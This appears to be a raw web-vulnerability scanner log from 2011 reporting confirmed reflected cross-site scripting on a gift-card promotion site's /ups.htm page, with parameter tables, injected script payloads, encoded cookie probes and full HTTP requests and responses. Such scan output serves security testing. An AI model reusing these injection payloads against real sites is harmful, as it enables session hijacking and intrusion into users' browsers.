<a href="/ups.htm?path=p.prize.prepop-reg-int-cc_gift&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" target="_blank" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET '"--></style></script><script>alert(0x000043)</script>
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000043)%3C/script%3E&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916183; scook=1303916183; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:56:23 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82e9786a08gly;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path='"--></style></script><script>netsparker(0x000043)</script>&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path='"-&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3"&SID=f05c7ce946bc38d8bfa6b839a4d56265 onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000043)</script>-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET '"--></style></script><script>alert(0x000070)</script>
promo_name GET 2192name
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

GET /ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000070)%3C/script%3E&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=3&ups_ref=cg&sendroikwd=3&raf_ad_id=3&remoteRef=3_4_0_5068_0&return_url=3&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1; gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916200; scook=1303916200; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:56:41 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82ea94e64fnnc;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id='"--></style></script><script>netsparker(0x000070)</script>&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000070)</script>&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000070)</script>&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=296..

Parameters

Parameter Type Value
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
path GET p.prize.prepop-reg-int
page_tmp_id GET 9
promotion_id GET 2192
promo_name GET '"--></style></script><script>alert(0x000077)</script>
catalog_id GET 13200
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_tmp GET 3
ups_ref GET cg
sendroikwd GET 3
raf_ad_id GET 3
remoteRef GET 3_4_0_5068_0
return_url GET 3
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265
page_list GET li_sr_sm

Request

